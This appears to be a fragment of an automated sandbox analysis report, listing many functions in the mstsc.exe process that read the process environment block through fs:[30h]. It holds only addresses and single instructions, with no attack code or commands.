      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B502 mov eax, dword ptr fs:[00000030h]5_2_0463B502
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04642500 mov eax, dword ptr fs:[00000030h]5_2_04642500
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467C50D mov eax, dword ptr fs:[00000030h]5_2_0467C50D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467C50D mov eax, dword ptr fs:[00000030h]5_2_0467C50D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CC51D mov eax, dword ptr fs:[00000030h]5_2_046CC51D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04661514 mov eax, dword ptr fs:[00000030h]5_2_04661514
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04661514 mov eax, dword ptr fs:[00000030h]5_2_04661514
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04661514 mov eax, dword ptr fs:[00000030h]5_2_04661514
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04661514 mov eax, dword ptr fs:[00000030h]5_2_04661514
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04661514 mov eax, dword ptr fs:[00000030h]5_2_04661514
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04661514 mov eax, dword ptr fs:[00000030h]5_2_04661514
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov ecx, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov ecx, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EF51B mov eax, dword ptr fs:[00000030h]5_2_046EF51B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467A5E7 mov ebx, dword ptr fs:[00000030h]5_2_0467A5E7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467A5E7 mov eax, dword ptr fs:[00000030h]5_2_0467A5E7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464B5E0 mov eax, dword ptr fs:[00000030h]5_2_0464B5E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464B5E0 mov eax, dword ptr fs:[00000030h]5_2_0464B5E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464B5E0 mov eax, dword ptr fs:[00000030h]5_2_0464B5E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464B5E0 mov eax, dword ptr fs:[00000030h]5_2_0464B5E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464B5E0 mov eax, dword ptr fs:[00000030h]5_2_0464B5E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464B5E0 mov eax, dword ptr fs:[00000030h]5_2_0464B5E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046715EF mov eax, dword ptr fs:[00000030h]5_2_046715EF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C55E0 mov eax, dword ptr fs:[00000030h]5_2_046C55E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CC5FC mov eax, dword ptr fs:[00000030h]5_2_046CC5FC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467C5C6 mov eax, dword ptr fs:[00000030h]5_2_0467C5C6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F5C7 mov eax, dword ptr fs:[00000030h]5_2_0463F5C7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C05C6 mov eax, dword ptr fs:[00000030h]5_2_046C05C6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046765D0 mov eax, dword ptr fs:[00000030h]5_2_046765D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C85AA mov eax, dword ptr fs:[00000030h]5_2_046C85AA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046445B0 mov eax, dword ptr fs:[00000030h]5_2_046445B0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046445B0 mov eax, dword ptr fs:[00000030h]5_2_046445B0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE588 mov eax, dword ptr fs:[00000030h]5_2_046BE588
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE588 mov eax, dword ptr fs:[00000030h]5_2_046BE588
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467A580 mov eax, dword ptr fs:[00000030h]5_2_0467A580
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467A580 mov eax, dword ptr fs:[00000030h]5_2_0467A580
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04679580 mov eax, dword ptr fs:[00000030h]5_2_04679580
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04679580 mov eax, dword ptr fs:[00000030h]5_2_04679580
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF582 mov eax, dword ptr fs:[00000030h]5_2_046FF582
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04672594 mov eax, dword ptr fs:[00000030h]5_2_04672594
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CC592 mov eax, dword ptr fs:[00000030h]5_2_046CC592
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046E7591 mov edi, dword ptr fs:[00000030h]5_2_046E7591
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04637662 mov eax, dword ptr fs:[00000030h]5_2_04637662
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04637662 mov eax, dword ptr fs:[00000030h]5_2_04637662
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04637662 mov eax, dword ptr fs:[00000030h]5_2_04637662
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C166E mov eax, dword ptr fs:[00000030h]5_2_046C166E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C166E mov eax, dword ptr fs:[00000030h]5_2_046C166E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C166E mov eax, dword ptr fs:[00000030h]5_2_046C166E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04653660 mov eax, dword ptr fs:[00000030h]5_2_04653660
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04653660 mov eax, dword ptr fs:[00000030h]5_2_04653660
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04653660 mov eax, dword ptr fs:[00000030h]5_2_04653660
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467666D mov esi, dword ptr fs:[00000030h]5_2_0467666D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467666D mov eax, dword ptr fs:[00000030h]5_2_0467666D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467666D mov eax, dword ptr fs:[00000030h]5_2_0467666D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04640670 mov eax, dword ptr fs:[00000030h]5_2_04640670
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682670 mov eax, dword ptr fs:[00000030h]5_2_04682670
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682670 mov eax, dword ptr fs:[00000030h]5_2_04682670
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04643640 mov eax, dword ptr fs:[00000030h]5_2_04643640
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465F640 mov eax, dword ptr fs:[00000030h]5_2_0465F640
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465F640 mov eax, dword ptr fs:[00000030h]5_2_0465F640
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465F640 mov eax, dword ptr fs:[00000030h]5_2_0465F640
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467C640 mov eax, dword ptr fs:[00000030h]5_2_0467C640
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467C640 mov eax, dword ptr fs:[00000030h]5_2_0467C640
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463D64A mov eax, dword ptr fs:[00000030h]5_2_0463D64A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463D64A mov eax, dword ptr fs:[00000030h]5_2_0463D64A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04675654 mov eax, dword ptr fs:[00000030h]5_2_04675654
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467265C mov eax, dword ptr fs:[00000030h]5_2_0467265C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467265C mov ecx, dword ptr fs:[00000030h]5_2_0467265C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467265C mov eax, dword ptr fs:[00000030h]5_2_0467265C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464965A mov eax, dword ptr fs:[00000030h]5_2_0464965A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464965A mov eax, dword ptr fs:[00000030h]5_2_0464965A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046ED62C mov ecx, dword ptr fs:[00000030h]5_2_046ED62C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046ED62C mov ecx, dword ptr fs:[00000030h]5_2_046ED62C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046ED62C mov eax, dword ptr fs:[00000030h]5_2_046ED62C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04645622 mov eax, dword ptr fs:[00000030h]5_2_04645622
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04645622 mov eax, dword ptr fs:[00000030h]5_2_04645622
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04647623 mov eax, dword ptr fs:[00000030h]5_2_04647623
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467C620 mov eax, dword ptr fs:[00000030h]5_2_0467C620
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04640630 mov eax, dword ptr fs:[00000030h]5_2_04640630
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04670630 mov eax, dword ptr fs:[00000030h]5_2_04670630
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467F63F mov eax, dword ptr fs:[00000030h]5_2_0467F63F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467F63F mov eax, dword ptr fs:[00000030h]5_2_0467F63F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C8633 mov esi, dword ptr fs:[00000030h]5_2_046C8633
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C8633 mov eax, dword ptr fs:[00000030h]5_2_046C8633
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C8633 mov eax, dword ptr fs:[00000030h]5_2_046C8633
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D3608 mov eax, dword ptr fs:[00000030h]5_2_046D3608
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D3608 mov eax, dword ptr fs:[00000030h]5_2_046D3608
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D3608 mov eax, dword ptr fs:[00000030h]5_2_046D3608
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D3608 mov eax, dword ptr fs:[00000030h]5_2_046D3608
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D3608 mov eax, dword ptr fs:[00000030h]5_2_046D3608
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D3608 mov eax, dword ptr fs:[00000030h]5_2_046D3608
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466D600 mov eax, dword ptr fs:[00000030h]5_2_0466D600
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466D600 mov eax, dword ptr fs:[00000030h]5_2_0466D600
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF607 mov eax, dword ptr fs:[00000030h]5_2_046FF607
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467360F mov eax, dword ptr fs:[00000030h]5_2_0467360F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04714600 mov eax, dword ptr fs:[00000030h]5_2_04714600
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046396E0 mov eax, dword ptr fs:[00000030h]5_2_046396E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046396E0 mov eax, dword ptr fs:[00000030h]5_2_046396E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464C6E0 mov eax, dword ptr fs:[00000030h]5_2_0464C6E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046456E0 mov eax, dword ptr fs:[00000030h]5_2_046456E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046456E0 mov eax, dword ptr fs:[00000030h]5_2_046456E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046456E0 mov eax, dword ptr fs:[00000030h]5_2_046456E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046666E0 mov eax, dword ptr fs:[00000030h]5_2_046666E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046666E0 mov eax, dword ptr fs:[00000030h]5_2_046666E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BC6F2 mov eax, dword ptr fs:[00000030h]5_2_046BC6F2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BC6F2 mov eax, dword ptr fs:[00000030h]5_2_046BC6F2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046406CF mov eax, dword ptr fs:[00000030h]5_2_046406CF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046E86C2 mov eax, dword ptr fs:[00000030h]5_2_046E86C2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470A6C0 mov eax, dword ptr fs:[00000030h]5_2_0470A6C0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466D6D0 mov eax, dword ptr fs:[00000030h]5_2_0466D6D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047086A8 mov eax, dword ptr fs:[00000030h]5_2_047086A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047086A8 mov eax, dword ptr fs:[00000030h]5_2_047086A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF68C mov eax, dword ptr fs:[00000030h]5_2_046FF68C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650680 mov eax, dword ptr fs:[00000030h]5_2_04650680
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04648690 mov eax, dword ptr fs:[00000030h]5_2_04648690
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BD69D mov eax, dword ptr fs:[00000030h]5_2_046BD69D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CC691 mov eax, dword ptr fs:[00000030h]5_2_046CC691
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04652760 mov ecx, dword ptr fs:[00000030h]5_2_04652760
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681763 mov eax, dword ptr fs:[00000030h]5_2_04681763
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681763 mov eax, dword ptr fs:[00000030h]5_2_04681763
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681763 mov eax, dword ptr fs:[00000030h]5_2_04681763
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681763 mov eax, dword ptr fs:[00000030h]5_2_04681763
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681763 mov eax, dword ptr fs:[00000030h]5_2_04681763
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04681763 mov eax, dword ptr fs:[00000030h]5_2_04681763
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04670774 mov eax, dword ptr fs:[00000030h]5_2_04670774
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04644779 mov eax, dword ptr fs:[00000030h]5_2_04644779
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04644779 mov eax, dword ptr fs:[00000030h]5_2_04644779
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04673740 mov eax, dword ptr fs:[00000030h]5_2_04673740
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C174B mov eax, dword ptr fs:[00000030h]5_2_046C174B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C174B mov ecx, dword ptr fs:[00000030h]5_2_046C174B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467174A mov eax, dword ptr fs:[00000030h]5_2_0467174A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04662755 mov eax, dword ptr fs:[00000030h]5_2_04662755
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04662755 mov eax, dword ptr fs:[00000030h]5_2_04662755
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04662755 mov eax, dword ptr fs:[00000030h]5_2_04662755
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04662755 mov ecx, dword ptr fs:[00000030h]5_2_04662755
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04662755 mov eax, dword ptr fs:[00000030h]5_2_04662755
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04662755 mov eax, dword ptr fs:[00000030h]5_2_04662755
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467A750 mov eax, dword ptr fs:[00000030h]5_2_0467A750
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463F75B mov eax, dword ptr fs:[00000030h]5_2_0463F75B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046EE750 mov eax, dword ptr fs:[00000030h]5_2_046EE750
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04669723 mov eax, dword ptr fs:[00000030h]5_2_04669723
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464D700 mov ecx, dword ptr fs:[00000030h]5_2_0464D700
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B705 mov eax, dword ptr fs:[00000030h]5_2_0463B705
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B705 mov eax, dword ptr fs:[00000030h]5_2_0463B705
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B705 mov eax, dword ptr fs:[00000030h]5_2_0463B705
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B705 mov eax, dword ptr fs:[00000030h]5_2_0463B705
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466270D mov eax, dword ptr fs:[00000030h]5_2_0466270D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466270D mov eax, dword ptr fs:[00000030h]5_2_0466270D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466270D mov eax, dword ptr fs:[00000030h]5_2_0466270D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF717 mov eax, dword ptr fs:[00000030h]5_2_046FF717
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470970B mov eax, dword ptr fs:[00000030h]5_2_0470970B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470970B mov eax, dword ptr fs:[00000030h]5_2_0470970B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464471B mov eax, dword ptr fs:[00000030h]5_2_0464471B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464471B mov eax, dword ptr fs:[00000030h]5_2_0464471B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046437E4 mov eax, dword ptr fs:[00000030h]5_2_046437E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046437E4 mov eax, dword ptr fs:[00000030h]5_2_046437E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046437E4 mov eax, dword ptr fs:[00000030h]5_2_046437E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046437E4 mov eax, dword ptr fs:[00000030h]5_2_046437E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046437E4 mov eax, dword ptr fs:[00000030h]5_2_046437E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046437E4 mov eax, dword ptr fs:[00000030h]5_2_046437E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046437E4 mov eax, dword ptr fs:[00000030h]5_2_046437E4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E7E0 mov eax, dword ptr fs:[00000030h]5_2_0466E7E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046477F9 mov eax, dword ptr fs:[00000030h]5_2_046477F9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046477F9 mov eax, dword ptr fs:[00000030h]5_2_046477F9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF7CF mov eax, dword ptr fs:[00000030h]5_2_046FF7CF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046407A7 mov eax, dword ptr fs:[00000030h]5_2_046407A7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_047117BC mov eax, dword ptr fs:[00000030h]5_2_047117BC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470D7A7 mov eax, dword ptr fs:[00000030h]5_2_0470D7A7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470D7A7 mov eax, dword ptr fs:[00000030h]5_2_0470D7A7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470D7A7 mov eax, dword ptr fs:[00000030h]5_2_0470D7A7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471B781 mov eax, dword ptr fs:[00000030h]5_2_0471B781
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471B781 mov eax, dword ptr fs:[00000030h]5_2_0471B781
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04671796 mov eax, dword ptr fs:[00000030h]5_2_04671796
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04671796 mov eax, dword ptr fs:[00000030h]5_2_04671796
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046BE79D mov eax, dword ptr fs:[00000030h]5_2_046BE79D
